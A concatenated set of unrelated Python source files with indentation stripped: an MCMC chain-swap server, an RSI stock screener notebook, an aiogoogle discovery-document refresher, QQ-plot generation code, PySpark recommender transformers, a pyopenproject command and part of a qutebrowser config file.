assert(ack1 == "SWAPPING")
assert(ack2 == "SWAPPING")
sg1 = SgRpcShim(socket1)
sg2 = SgRpcShim(socket2)
if client1 not in self.scbs:
self.scbs[client1] = sg1.get_scbs()
self.raw_signals[client1] = sg1.get_raw()
if client2 not in self.scbs:
self.scbs[client2] = sg2.get_scbs()
self.raw_signals[client2] = sg2.get_raw()
assert(self.scbs[client1] == self.scbs[client2])
scbs = list(self.scbs[client1])
raw1 = self.raw_signals[client1]
raw2 = self.raw_signals[client2]
"""
for scb in scbs:
accepted = crossover_uatemplates(sg1, sg2, scb, raw1, raw2,
crossover_period_s=5.0,
crossover_period_pre_s = 2.0)
logging.info("crossover at %s: accepted %s" % (str(scb), str(accepted)))
sg1.move_finished("crossover_uatemplates_short", accepted)
sg2.move_finished("crossover_uatemplates_short", accepted)
for scb in scbs:
accepted = crossover_uatemplates(sg1, sg2, scb, raw1, raw2)
logging.info("crossover at %s: accepted %s" % (str(scb), str(accepted)))
sg1.move_finished("crossover_uatemplates", accepted)
sg2.move_finished("crossover_uatemplates", accepted)
"""
accepted = crossover_event_region_move(sg1, sg2, raw1, raw2,
crossover_radius_km=1000,
crossover_radius_s=2000)
logging.info("event region crossover accepted %s" % (str(accepted)))
sg1.move_finished("crossover_event_region", accepted)
sg2.move_finished("crossover_event_region", accepted)
accepted = swap_events_move(sg1, sg2, raw1, raw2)
logging.info("event swap accepted %s" % (str(accepted)))
sg1.move_finished("crossover_event_swap", accepted)
sg2.move_finished("crossover_event_swap", accepted)
sg1.done()
sg2.done()
self._cleanup_swap(client1, client2)
class SgRpcShim(object):
def __init__(self, socket):
self.socket = socket
def get_raw(self):
return self._send_cmd("GET_RAW", kwargs={})
def get_scbs(self):
return self._send_cmd("GET_SCBS", kwargs={})
def get_event_locs(self):
cmd = "GET_EVENT_LOCS"
return self._send_cmd(cmd, kwargs={})
def get_event_templates(self, eid):
kwargs = {"eid": eid}
cmd = "GET_EVENT_TEMPLATES"
return self._send_cmd(cmd, kwargs=kwargs)
def kill_event(self, eid):
kwargs = {"eid": eid}
cmd = "KILL_EVENT"
return self._send_cmd(cmd, kwargs=kwargs)
def birth_event(self, evdict, tmvals, force_id=None):
kwargs = {"evdict": evdict, "tmvals": tmvals, "force_id": force_id}
cmd = "BIRTH_EVENT"
return self._send_cmd(cmd, kwargs=kwargs)
def current_log_p(self):
cmd = "CURRENT_LOG_P"
return self._send_cmd(cmd, kwargs={})
def current_log_p_breakdown(self):
cmd = "BREAKDOWN"
return self._send_cmd(cmd, kwargs={})
def birth_template(self, scb, tmvals, force_id=None):
kwargs = {"scb": scb, "tmvals": tmvals, "force_id": force_id}
cmd = "BIRTH_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def kill_template(self, tmid):
kwargs = {"tmid": tmid}
cmd = "KILL_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def set_template(self, tmid, tmvals):
kwargs = {"tmvals": tmvals, "tmid": tmid}
cmd = "SET_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def logp_at_scb(self, scb):
kwargs = {"scb": scb}
cmd = "LOGP_AT_SCB"
return self._send_cmd(cmd, kwargs)
def uatemplates_at_scb(self, scb):
kwargs = {"scb": scb}
cmd = "UATEMPLATES_AT_SCB"
return self._send_cmd(cmd, kwargs)
def dump_img_scb(self, scb, label):
cmd = "DUMP_IMG_SCB"
kwargs = {"scb": scb, "label": label}
return self._send_cmd(cmd, kwargs)
def debug(self):
msg = "DEBUG"
self.socket.send(msg)
def move_finished(self, move_name, accepted):
cmd = "COUNT"
kwargs = {"move_name": move_name, "accepted": accepted}
return self._send_cmd(cmd, kwargs)
def done(self):
msg = "DONE"
self.socket.send(msg)
def _send_cmd(self, cmd, kwargs):
argstr = serialize(kwargs)
msg = cmd + " " + argstr
self.socket.send(msg)
rstr = self.socket.recv()
resp = deserialize(rstr)
#print "cmd", cmd, "response", rstr, "deserialized", resp
return resp
def run_parallel_coarse_to_fine(names, specs,
server_only=False, client_only=None,
min_swap_s = 20.0,
max_swap_s = 45.0,
allowable_wait_s = 0.5):
# names is an ordered list of strings naming each thread.
# - we will only ever run swap moves between adjacent threads
# specs is a dict mapping name:(modelspec, runspec)
processes = {}
def chain_neighbors(a):
# given a list, return a dict encoding the graph where each
# entry is connected to its predecessor and successor.
d = {}
for i, x in enumerate(a):
d[x] = []
if i > 0:
d[x].append(a[i-1])
if i < len(a)-1:
d[x].append(a[i+1])
return d
control_port=5555
neighbors = chain_neighbors(names)
if client_only is not None:
name = client_only
ms, rs = specs[name]
run_client(name, ms, rs, control_port)
return
if not server_only:
for name in names:
ms, rs = specs[name]
processes[name] = Process(target=run_client, kwargs={"name": name,
"modelspec": ms,
"runspec": rs,
"port": control_port})
processes[name].start()
serv = SgSwapServer(neighbors=neighbors,
min_swap_s = min_swap_s,
allowable_wait_s = allowable_wait_s,
port=control_port)
rootLogger = logging.getLogger()
rootLogger.setLevel("INFO")
def any_children_alive():
if server_only:
return True
for name in names:
if processes[name].is_alive():
return True
return False
while any_children_alive():
serv.process()
logging.debug( "state dump: %s " % serv.client_state)
| nilq/baby-python | python |
#!/usr/bin/env python
# coding: utf-8
# In[79]:
'''
https://github.com/bbmusa
'''
from pandas_datareader import data as pdr
from yahoo_fin import stock_info as si
# In[2]:
import pandas as pd
# In[3]:
import numpy as np
# In[7]:
tickers = si.tickers_nifty50()
# In[17]:
tickers.remove('MM.NS')
# In[72]:
start_date = '2021-11-10'
end_date = '2022-02-14'
# In[73]:
'''
J. Welles Wilder'RSI, Indicator simply find blue chip gold mines for you.
'''
def download_all_stock_data(all_stock_symbols, start_date, end_date):
def download_stock_data(single_symbol):
print(' Downloading '+single_symbol+' data ')
# try:
tmp1=pdr.get_data_yahoo(single_symbol,start=start_date,end=end_date)
# except KeyError:
# pass
return(tmp1)
downloaded_data=map(download_stock_data,all_stock_symbols)
return(pd.concat(downloaded_data,keys=all_stock_symbols, names=['Ticker','Date']))
# In[74]:
stock_data=download_all_stock_data(tickers, start_date, end_date)
fileName = 'downloadedData.pkl'
stock_data.to_pickle(fileName)
# In[80]:
'''
RSI = 100-{100/(1+RS)}
RS= Average gain/Average Loss
This rsi is based on 14 periods which means:
+ first avrage gain = sum of gains over the 14 periods / 14
+ first avrage loss = sum of loss over the 14 periods / 14
'''
def compute_RSI(data,period_RSI):
differencePrice = data['Close'].diff()
differencePriceValues=differencePrice.values
positive_differences=0
negative_differences=0
current_average_positive=0
current_average_negative=0
price_index=0
RSI=[]
for difference in differencePriceValues[1:]:
if difference>0:
positive_difference=difference
negative_difference=0
if difference<0:
negative_difference=np.abs(difference)
positive_difference=0
if difference==0:
negative_difference=0
positive_difference=0
if (price_index<period_RSI):
current_average_positive=current_average_positive+(1/period_RSI)*positive_difference
current_average_negative=current_average_negative+(1/period_RSI)*negative_difference
if(price_index==(period_RSI-1)):
if current_average_negative!=0:
RSI.append(100 - 100/(1+(current_average_positive/current_average_negative)))
else:
RSI.append(100)
else:
current_average_positive=((period_RSI-1)*current_average_positive+positive_difference)/(period_RSI)
current_average_negative=((period_RSI-1)*current_average_negative+negative_difference)/(period_RSI)
if current_average_negative!=0:
RSI.append(100 - 100/(1+(current_average_positive/current_average_negative)))
else:
RSI.append(100)
price_index=price_index+1
RSI_series=pd.Series(data=RSI,index=differencePrice.index[period_RSI:])
return(RSI_series)
# In[76]:
RSI_all_ticker=pd.Series(index=tickers)
for stock_symbol in tickers:
test1=compute_RSI(stock_data.loc[stock_symbol],28)
RSI_all_ticker.loc[stock_symbol]=test1[-1]
RSI_all_ticker.plot(figsize=(12,12))
# In[77]:
RSI_all_ticker.idxmin()
# In[78]:
'''
we consider A perticular stock is overbought if RSI above 70 and
over sold below 30
generally people takes RSI<40 as a Rocket
'''
RSI_all_ticker.nsmallest(80)
# In[ ]:
# In[ ]:
| nilq/baby-python | python |
#!/usr/bin/python3.7
from aiogoogle import Aiogoogle
import os
import sys
import errno
import json
import asyncio
from aiohttp import ClientSession
from aiogoogle import HTTPError
import pprint
def _check_for_correct_cwd(current_dir):
if current_dir[-9:] != "aiogoogle": # current dir is aiogoogle
print(current_dir)
print("must be in aiogoogle's dir, not test dir")
sys.exit()
def _pop_unstable_apis(all_apis: list):
stable_apis = []
for api in all_apis:
if not len(api[1]) > 3: # No funky versions because they break the tests alot
stable_apis.append(api)
return stable_apis
async def refresh_disc_docs_json():
file_errors = []
current_dir = os.getcwd()
# Create new .data/ dir if one doesn't exists
_check_for_correct_cwd(current_dir)
# Refresh all_apis in tests/tests_globals.py
all_apis = []
final_all_apis = []
async with ClientSession() as sess:
apis_pref = await sess.get(
"https://www.googleapis.com/discovery/v1/apis?preferred=true"
)
apis_pref = await apis_pref.json()
for api in apis_pref["items"]:
all_apis.append((api["name"], api["version"]))
all_apis = _pop_unstable_apis(all_apis)
final_all_apis = all_apis
async with Aiogoogle() as google:
tasks = [google.discover(name, version) for (name, version) in all_apis]
print('Requesting all APIs, this might take a while')
all_discovery_documents = await asyncio.gather(*tasks, return_exceptions=True)
# Refresh discovery files in tests/data
for i, google_api in enumerate(all_discovery_documents):
name = all_apis[i][0]
version = all_apis[i][1]
if isinstance(google_api, HTTPError):
e = google_api
if e.res.status_code != 404:
print('Non 404 error')
print('\033[91m\n' + e + '\n\033[0m')
if e.res.status_code == 404:
# only ignore if it's a 404 error. Should raise an error otherwise
final_all_apis = list(filter(lambda api: (api[0] != name), final_all_apis))
file_errors.append({f"{name}-{version}": str(e)})
print(f'\033[91mError: Failed to download {name} {version}\033[0m')
continue
data_dir_name = current_dir + "/tests/data/"
try:
if not os.path.exists(data_dir_name):
os.makedirs(data_dir_name)
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Save discovery docuemnt as .json file to the newly created data dir
file_name = (
current_dir
+ "/tests/data/"
+ name
+ "_"
+ version
+ "_discovery_doc.json"
)
with open(file_name, "w") as discovery_file:
json.dump(google_api.discovery_document, discovery_file)
print(f"saved {name}-{version} to {file_name}")
print("Done")
if file_errors:
print(f"Errors found: {str(file_errors)}")
with open("tests/ALL_APIS.py", "w") as f:
f.write("""### This file is autogenerated ###\n""")
f.write(f"ALL_APIS = {pprint.pformat(final_all_apis)}")
print("SUCCESS!")
if __name__ == "__main__":
asyncio.get_event_loop().run_until_complete(refresh_disc_docs_json())
| nilq/baby-python | python |
"""
Create json files which can be used to render QQ plots.
Extracted from PheWeb: 2cfaa69
"""
# TODO: make gc_lambda for maf strata, and show them if they're >1.1?
# TODO: copy some changes from <https://github.com/statgen/encore/blob/master/plot-epacts-output/make_qq_json.py>
# Peter has included some original notes on the processing requirements, as follows::
# TODO: reduce QQ memory using Counter(v.qval for v in variants).
# - but we still need to split into 4 strata using MAF. Can that be done efficiently?
# a) we could keep balanced lists for the 4 strata, but we can only be confidently start processing variants
# once we've read 3/4 of all variants
# b) we could assume that, since we're sorted by chr-pos-ref-alt, MAF should be pretty randomly ordered.
# - then we could start processing variants after reading only 10% of all variants
# - if we're wrong, `raise StrataGuessingFailed()` and try again with sorting.
# c) we could run manhattan before this, and make it track Counter(rounded(v.maf,2) for v in variants).
# NOTE: `qval` means `-log10(pvalue)`
import collections
import logging
import math
import typing as ty
import boltons.iterutils
import boltons.mathutils
import scipy.stats
from zorp.parsers import BasicVariant
NUM_BINS = 400
NUM_MAF_RANGES = 4
MAF_SIGFIGS = 2
logger = logging.getLogger(__name__)
Variant = collections.namedtuple('Variant', ['qval', 'maf'])
def augment_variants(variants: ty.Iterator[BasicVariant], num_samples=None):
for var in variants:
if var.pvalue == 0:
# FIXME: Why does QQ plot require this stub value?
qval = 1000 # TODO(pjvh): make an option "convert_pval0_to = [num|None]"
else:
qval = var.neg_log_pvalue
af = var.maf
if af is not None:
af = round(af, MAF_SIGFIGS)
yield Variant(qval=qval, maf=af)
def round_sig(x, digits):
if x == 0:
return 0
elif abs(x) == math.inf or math.isnan(x):
raise ValueError("Cannot round infinity or NaN")
else:
log = math.log10(abs(x))
digits_above_zero = int(math.floor(log))
return round(x, digits - 1 - digits_above_zero)
# TODO: Move these to unit tests
assert round_sig(0.00123, 2) == 0.0012
assert round_sig(1.59e-10, 2) == 1.6e-10
def approx_equal(a, b, tolerance=1e-4):
return abs(a - b) <= max(abs(a), abs(b)) * tolerance
# TODO: Move these to unit tests
assert approx_equal(42, 42.0000001)
assert not approx_equal(42, 42.01)
def make_qq_stratified(variants):
# Some variants may be missing MAF. Sort those at the end of the list (eg, lump with the common variants)
variants = sorted(variants, key=lambda v: (v.maf is None, v.maf))
def make_strata(idx):
# Note: slice_indices[1] is the same as slice_indices[0] of the next slice.
# But that's not a problem, because range() ignores the last index.
slice_indices = (len(variants) * idx // NUM_MAF_RANGES,
len(variants) * (idx + 1) // NUM_MAF_RANGES)
qvals = sorted((variants[i].qval for i in range(*slice_indices)), reverse=True)
return {
'maf_range': (variants[slice_indices[0]].maf,
variants[slice_indices[1] - 1].maf),
'count': len(qvals),
'qq': compute_qq(qvals),
}
return [make_strata(i) for i in range(NUM_MAF_RANGES)]
def make_qq_unstratified(variants, include_qq):
qvals = sorted((v.qval for v in variants), reverse=True)
rv = {}
if include_qq:
rv['qq'] = compute_qq(qvals)
rv['count'] = len(qvals)
rv['gc_lambda'] = {}
for perc in ['0.5', '0.1', '0.01', '0.001']:
gc = gc_value_from_list(qvals, float(perc))
if math.isnan(gc) or abs(gc) == math.inf:
logger.warning('WARNING: got gc_value {!r}'.format(gc))
else:
rv['gc_lambda'][perc] = round_sig(gc, 5)
return rv
def compute_qq(qvals):
# qvals must be in decreasing order.
assert all(a >= b for a, b in boltons.iterutils.pairwise(qvals))
if len(qvals) == 0:
return []
if qvals[0] == 0:
logger.warning('WARNING: All pvalues are 1! How is that supposed to make a QQ plot?')
return []
max_exp_qval = -math.log10(0.5 / len(qvals))
# Our QQ plot will only show `obs_qval` up to `ceil(2*max_exp_pval)`.
# So we can drop any obs_qval above that, to save space and make sure the visible range gets all the NUM_BINS.
# this calculation must avoid dropping points that would be shown by the calculation done in javascript.
# `max_obs_qval` means the largest observed -log10(pvalue) that will be shown in the plot. It's usually NOT the
# largest in the data.
max_obs_qval = boltons.mathutils.clamp(qvals[0],
lower=max_exp_qval,
upper=math.ceil(2 * max_exp_qval))
if qvals[0] > max_obs_qval:
for qval in qvals:
if qval <= max_obs_qval:
max_obs_qval = qval
break
occupied_bins = set()
for i, obs_qval in enumerate(qvals):
if obs_qval > max_obs_qval:
continue
exp_qval = -math.log10((i + 0.5) / len(qvals))
exp_bin = int(exp_qval / max_exp_qval * NUM_BINS)
# TODO(pjvh): it'd be great if the `obs_bin`s started right at the lowest qval in that `exp_bin`.
# that way we could have fewer bins but still get a nice straight diagonal line without that
# stair-stepping appearance.
obs_bin = int(obs_qval / max_obs_qval * NUM_BINS)
occupied_bins.add((exp_bin, obs_bin))
bins = []
for exp_bin, obs_bin in occupied_bins:
assert 0 <= exp_bin <= NUM_BINS, exp_bin
assert 0 <= obs_bin <= NUM_BINS, obs_bin
bins.append((
exp_bin / NUM_BINS * max_exp_qval,
obs_bin / NUM_BINS * max_obs_qval
))
return {
'bins': sorted(bins),
'max_exp_qval': max_exp_qval,
}
def gc_value_from_list(qvals, quantile=0.5):
# qvals must be in decreasing order.
assert all(a >= b for a, b in boltons.iterutils.pairwise(qvals))
qval = qvals[int(len(qvals) * quantile)]
pval = 10 ** -qval
return gc_value(pval, quantile)
def gc_value(pval, quantile=0.5):
# This should be equivalent to R: `qchisq(median_pval, df=1, lower.tail=F) / qchisq(quantile, df=1, lower.tail=F)`
return scipy.stats.chi2.ppf(1 - pval, 1) / scipy.stats.chi2.ppf(1 - quantile, 1)
# TODO: These should be moved to unit tests
assert approx_equal(gc_value(0.49), 1.047457) # computed using R code.
assert approx_equal(gc_value(0.5), 1)
assert approx_equal(gc_value(0.50001), 0.9999533)
assert approx_equal(gc_value(0.6123), 0.5645607)
def get_confidence_intervals(num_variants, confidence=0.95):
one_sided_doubt = (1 - confidence) / 2
# `variant_counts` are the numbers of variants at which we'll calculate the confidence intervals
# any `1 <= variant_count <= num_variants-1` could be used, but scale in powers of 2 to make the CI visually smooth
variant_counts = []
for x in range(0, int(math.ceil(math.log2(num_variants)))):
variant_counts.append(2 ** x)
variant_counts.append(num_variants - 1)
variant_counts.reverse()
for variant_count in variant_counts:
rv = scipy.stats.beta(variant_count, num_variants - variant_count)
yield {
'x': round(-math.log10((variant_count - 0.5) / num_variants), 2),
'y_min': round(-math.log10(rv.ppf(1 - one_sided_doubt)), 2),
'y_max': round(-math.log10(rv.ppf(one_sided_doubt)), 2),
}
| nilq/baby-python | python |
# coding: utf-8
from pyspark import keyword_only
from pyspark.ml import Transformer
from pyspark.ml.param.shared import Param
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
spark = SparkSession.builder.getOrCreate()
class RatingBuilder(Transformer):
def _transform(self, raw_df):
rating_df = raw_df \
.selectExpr('from_user_id AS user', 'repo_id AS item', '1 AS rating', 'starred_at') \
.orderBy('user', F.col('starred_at').desc())
return rating_df
# TODO: 不適用新版的資料庫 schema 了,待處理
class DataCleaner(Transformer):
@keyword_only
def __init__(self, min_item_stargazers_count=None, max_item_stargazers_count=None, min_user_starred_count=None, max_user_starred_count=None):
super(DataCleaner, self).__init__()
self.min_item_stargazers_count = Param(self, 'min_item_stargazers_count', '移除 stargazer 數低於這個數字的 item')
self.max_item_stargazers_count = Param(self, 'max_item_stargazers_count', '移除 stargazer 數超過這個數字的 item')
self.min_user_starred_count = Param(self, 'min_user_starred_count', '移除 starred repo 數低於這個數字的 user')
self.max_user_starred_count = Param(self, 'max_user_starred_count', '移除 starred repo 數超過這個數字的 user')
self._setDefault(min_item_stargazers_count=1, max_item_stargazers_count=50000, min_user_starred_count=1, max_user_starred_count=50000)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, min_item_stargazers_count=None, max_item_stargazers_count=None, min_user_starred_count=None, max_user_starred_count=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def set_min_item_stargazers_count(self, value):
self._paramMap[self.min_item_stargazers_count] = value
return self
def get_min_item_stargazers_count(self):
return self.getOrDefault(self.min_item_stargazers_count)
def set_max_item_stargazers_count(self, value):
self._paramMap[self.max_item_stargazers_count] = value
return self
def get_max_item_stargazers_count(self):
return self.getOrDefault(self.max_item_stargazers_count)
def set_min_user_starred_count(self, value):
self._paramMap[self.min_user_starred_count] = value
return self
def get_min_user_starred_count(self):
return self.getOrDefault(self.min_user_starred_count)
def set_max_user_starred_count(self, value):
self._paramMap[self.max_user_starred_count] = value
return self
def get_max_user_starred_count(self):
return self.getOrDefault(self.max_user_starred_count)
def _transform(self, rating_df):
min_item_stargazers_count = self.get_min_item_stargazers_count()
max_item_stargazers_count = self.get_max_item_stargazers_count()
min_user_starred_count = self.get_min_user_starred_count()
max_user_starred_count = self.get_max_user_starred_count()
to_keep_items_df = rating_df \
.groupBy('item') \
.agg(F.count('user').alias('stargazers_count')) \
.where('stargazers_count >= {0} AND stargazers_count <= {1}'.format(min_item_stargazers_count, max_item_stargazers_count)) \
.orderBy('stargazers_count', ascending=False) \
.select('item', 'stargazers_count')
temp1_df = rating_df.join(to_keep_items_df, 'item', 'inner')
to_keep_users_df = temp1_df \
.groupBy('user') \
.agg(F.count('item').alias('starred_count')) \
.where('starred_count >= {0} AND starred_count <= {1}'.format(min_user_starred_count, max_user_starred_count)) \
.orderBy('starred_count', ascending=False) \
.select('user', 'starred_count')
temp2_df = temp1_df.join(to_keep_users_df, 'user', 'inner')
clean_df = temp2_df.select('user', 'item', 'rating', 'starred_at')
return clean_df
class PredictionProcessor(Transformer):
def _transform(self, predicted_df):
non_null_df = predicted_df.dropna(subset=['prediction', ])
prediction_df = non_null_df.withColumn('prediction', non_null_df['prediction'].cast('double'))
return prediction_df
| nilq/baby-python | python |
import json
from pyopenproject.api_connection.exceptions.request_exception import RequestError
from pyopenproject.api_connection.requests.post_request import PostRequest
from pyopenproject.business.exception.business_error import BusinessError
from pyopenproject.business.services.command.work_package.work_package_command import WorkPackageCommand
from pyopenproject.model.form import Form
class CreateRelationForm(WorkPackageCommand):
def __init__(self, connection, work_package, relation):
super().__init__(connection)
self.work_package = work_package
self.relation = relation
def execute(self):
try:
json_obj = PostRequest(connection=self.connection,
context=f"{self.CONTEXT}/{self.work_package.id}/form",
json=json.dumps(self.relation.__dict__)).execute()
return Form(json_obj)
except RequestError as re:
raise BusinessError(f"Error creating relation for work package {self.work_package.id}") from re
| nilq/baby-python | python |
# qutebrowser config.py
#
# NOTE: config.py is intended for advanced users who are comfortable
# with manually migrating the config file on qutebrowser upgrades. If
# you prefer, you can also configure qutebrowser using the
# :set/:bind/:config-* commands without having to write a config.py
# file.
#
# Documentation:
# qute://help/configuring.html
# qute://help/settings.html
# Uncomment this to still load settings configured via autoconfig.yml
# config.load_autoconfig()
# Aliases for commands. The keys of the given dictionary are the
# aliases, while the values are the commands they map to.
# Type: Dict
c.aliases = {
'wq' : 'quit --save',
'w' : 'session-save',
'q' : 'quit',
'pe' : 'set content.proxy http://localhost:8080',
'pd' : 'set content.proxy system',
'mpv' : 'spawn --userscript mpv'
}
# Require a confirmation before quitting the application.
# Type: ConfirmQuit
# Valid values:
# - always: Always show a confirmation.
# - multiple-tabs: Show a confirmation if multiple tabs are opened.
# - downloads: Show a confirmation if downloads are running
# - never: Never show a confirmation.
c.confirm_quit = ['never']
# Maximum time (in minutes) between two history items for them to be
# considered being from the same browsing session. Items with less time
# between them are grouped when being displayed in `:history`. Use -1 to
# disable separation.
# Type: Int
c.history_gap_interval = 30
# When to find text on a page case-insensitively.
# Type: IgnoreCase
# Valid values:
# - always: Search case-insensitively.
# - never: Search case-sensitively.
# - smart: Search case-sensitively if there are capital characters.
c.search.ignore_case = 'smart'
# Find text on a page incrementally, renewing the search for each typed
# character.
# Type: Bool
c.search.incremental = True
# How to open links in an existing instance if a new one is launched.
# This happens when e.g. opening a link from a terminal. See
# `new_instance_open_target_window` to customize in which window the
# link is opened in.
# Type: String
# Valid values:
# - tab: Open a new tab in the existing window and activate the window.
# - tab-bg: Open a new background tab in the existing window and activate the window.
# - tab-silent: Open a new tab in the existing window without activating the window.
# - tab-bg-silent: Open a new background tab in the existing window without activating the window.
# - window: Open in a new window.
c.new_instance_open_target = 'tab'
# Which window to choose when opening links as new tabs. When
# `new_instance_open_target` is set to `window`, this is ignored.
# Type: String
# Valid values:
# - first-opened: Open new tabs in the first (oldest) opened window.
# - last-opened: Open new tabs in the last (newest) opened window.
# - last-focused: Open new tabs in the most recently focused window.
# - last-visible: Open new tabs in the most recently visible window.
c.new_instance_open_target_window = 'last-focused'
# Name of the session to save by default. If this is set to null, the
# session which was last loaded is saved.
# Type: SessionName
c.session.default_name = None
# Load a restored tab as soon as it takes focus.
# Type: Bool
c.session.lazy_restore = False
# Backend to use to display websites. qutebrowser supports two different
# web rendering engines / backends, QtWebKit and QtWebEngine. QtWebKit
# was discontinued by the Qt project with Qt 5.6, but picked up as a
# well maintained fork: https://github.com/annulen/webkit/wiki -
# qutebrowser only supports the fork. QtWebEngine is Qt's official
# successor to QtWebKit. It's slightly more resource hungry than
# QtWebKit and has a couple of missing features in qutebrowser, but is
# generally the preferred choice.
# Type: String
# Valid values:
# - webengine: Use QtWebEngine (based on Chromium).
# - webkit: Use QtWebKit (based on WebKit, similar to Safari).
c.backend = 'webengine'
# Time interval (in milliseconds) between auto-saves of
# config/cookies/etc.
# Type: Int
c.auto_save.interval = 15000
# Always restore open sites when qutebrowser is reopened.
# Type: Bool
c.auto_save.session = False
# Automatically start playing `<video>` elements. Note: On Qt < 5.11,
# this option needs a restart and does not support URL patterns.
# Type: Bool
c.content.autoplay = True
# Size (in bytes) of the HTTP network cache. Null to use the default
# value. With QtWebEngine, the maximum supported value is 2147483647 (~2
# GB).
# Type: Int
c.content.cache.size = None
# Allow websites to read canvas elements. Note this is needed for some
# websites to work properly.
# Type: Bool
c.content.canvas_reading = True
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'chrome-devtools://*')
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
config.set('content.cookies.accept', 'all', 'devtools://*')
# Which cookies to accept. With QtWebEngine, this setting also controls
# other features with tracking capabilities similar to those of cookies;
# including IndexedDB, DOM storage, filesystem API, service workers, and
# AppCache. Note that with QtWebKit, only `all` and `never` are
# supported as per-domain values. Setting `no-3rdparty` or `no-
# unknown-3rdparty` per-domain on QtWebKit will have the same effect as
# `all`. If this setting is used with URL patterns, the pattern gets
# applied to the origin/first party URL of the page making the request,
# not the request URL.
# Type: String
# Valid values:
# - all: Accept all cookies.
# - no-3rdparty: Accept cookies from the same origin only. This is known to break some sites, such as GMail.
# - no-unknown-3rdparty: Accept cookies from the same origin only, unless a cookie is already set for the domain. On QtWebEngine, this is the same as no-3rdparty.
# - never: Don't accept cookies at all.
c.content.cookies.accept = 'no-3rdparty'
# Store cookies. Note this option needs a restart with QtWebEngine on Qt
# < 5.9.
# Type: Bool
c.content.cookies.store = True
# Default encoding to use for websites. The encoding must be a string
# describing an encoding such as _utf-8_, _iso-8859-1_, etc.
# Type: String
c.content.default_encoding = 'utf-8'
# Limit fullscreen to the browser window (does not expand to fill the
# screen).
# Type: Bool
c.content.fullscreen.window = False
# Allow websites to share screen content. On Qt < 5.10, a dialog box is
# always displayed, even if this is set to "true".
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.desktop_capture = 'ask'
# Try to pre-fetch DNS entries to speed up browsing.
# Type: Bool
c.content.dns_prefetch = True
# Allow websites to request geolocations.
# Type: BoolAsk
# Valid values:
# - true
# - false
# - ask
c.content.geolocation = 'ask'
# Value to send in the `Accept-Language` header. Note that the value
# read from JavaScript is always the global value.
# Type: String
c.content.headers.accept_language = 'en-US,en'
# Custom headers for qutebrowser HTTP requests.
# Type: Dict
c.content.headers.custom = {}
# Value to send in the `DNT` header. When this is set to true,
# qutebrowser asks websites to not track your identity. If set to null,
# the DNT header is not sent at all.
# Type: Bool
c.content.headers.do_not_track = True
# When to send the Referer header. The Referer header tells websites
# from which website you were coming from when visiting them. No restart
# is needed with QtWebKit.
# Type: String
# Valid values:
# - always: Always send the Referer.
# - never: Never send the Referer. This is not recommended, as some sites may break.
# - same-domain: Only send the Referer for the same domain. This will still protect your privacy, but shouldn't break any sites. With QtWebEngine, the referer will still be sent for other domains, but with stripped path information.
c.content.headers.referer = 'same-domain'
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}) AppleWebKit/{webkit_version} (KHTML, like Gecko) {upstream_browser_key}/{upstream_browser_version} Safari/{webkit_version}', 'https://web.whatsapp.com/')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
# QtWebEngine). * `{qt_key}`: "Qt" for QtWebKit, "QtWebEngine" for
# QtWebEngine. * `{qt_version}`: The underlying Qt version. *
# `{upstream_browser_key}`: "Version" for QtWebKit, "Chrome" for
# QtWebEngine. * `{upstream_browser_version}`: The corresponding
# Safari/Chrome version. * `{qutebrowser_version}`: The currently
# running qutebrowser version. The default value is equal to the
# unchanged user agent of QtWebKit/QtWebEngine. Note that the value
# read from JavaScript is always the global value. With QtWebEngine
# between 5.12 and 5.14 (inclusive), changing the value exposed to
# JavaScript requires a restart.
# Type: FormatString
config.set('content.headers.user_agent', 'Mozilla/5.0 ({os_info}; rv:71.0) Gecko/20100101 Firefox/71.0', 'https://accounts.google.com/*')
# User agent to send. The following placeholders are defined: *
# `{os_info}`: Something like "X11; Linux x86_64". * `{webkit_version}`:
# The underlying WebKit version (set to a fixed value with
